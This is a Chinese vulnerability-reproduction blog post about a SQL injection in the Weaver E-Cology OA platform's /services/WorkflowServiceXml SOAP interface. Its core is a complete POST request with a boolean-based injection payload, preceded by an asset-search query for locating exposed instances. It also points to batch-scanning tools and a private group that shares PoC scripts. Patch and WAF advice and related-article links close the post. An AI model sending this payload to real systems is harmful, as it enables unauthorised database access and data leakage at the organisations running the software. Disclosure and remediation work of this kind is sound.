【漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞

0x01 产品简介

泛微e-cology是一款由泛微网络科技开发的协同管理平台,支持人力资源、财务、行政等多功能管理和移动办公。

0x02 漏洞概述

泛微OAE-Cology 接口/services/WorkflowServiceXml 存在SQL注入漏洞,可获取数据库权限,导致数据泄露。

0x03 搜索引擎

bash 复制代码
app="泛微-OA(e-cology)"

0x04 漏洞复现

bash 复制代码
POST /services/WorkflowServiceXml HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: text/xml
Accept-Encoding: gzip
Content-Length: 487

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver"> <soapenv:Header/>
  <soapenv:Body>
      <web:getHendledWorkflowRequestList>
        <web:in0>1</web:in0>
        <web:in1>1</web:in1>
        <web:in2>1</web:in2>
        <web:in3>1</web:in3>
        <web:in4>
            <web:string>1=1 AND 5615=5615</web:string>
        </web:in4>
      </web:getHendledWorkflowRequestList>
  </soapenv:Body>
</soapenv:Envelope>

sqlmap验证

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子

0x06 修复建议

1、官方已发布升级补丁包,支持在线升级和离线补丁安装

https://www.weaver.com.cn/cs/securityDownload.html?src=cn

2、临时解决方案

使用WAF等安全设备进行防护。

在不影响业务的情况下配置URL访问控制策略。

限制访问来源地址,如非必要,不要将系统开放在互联网上。

相关推荐
Hacker_LaoYi7 小时前
SQL注入的那些面试题总结
数据库·sql
Hacker_LaoYi9 小时前
【渗透技术总结】SQL手工注入总结
数据库·sql
独行soc9 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍06-基于子查询的SQL注入(Subquery-Based SQL Injection)
数据库·sql·安全·web安全·漏洞挖掘·hw
独行soc11 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
清平乐的技术专栏12 小时前
Hive SQL 查询所有函数
hive·hadoop·sql
cmdch201716 小时前
Mybatis加密解密查询操作(sql前),where要传入加密后的字段时遇到的问题
数据库·sql·mybatis
程序猿小柒17 小时前
【Spark】Spark SQL执行计划-精简版
大数据·sql·spark
听见~18 小时前
SQL优化
数据库·sql
明矾java20 小时前
Mysql-SQL执行流程解析
数据库·sql·mysql
NY61 天前
mysql运维篇笔记——日志,主从复制,分库分表,读写分离
数据库·sql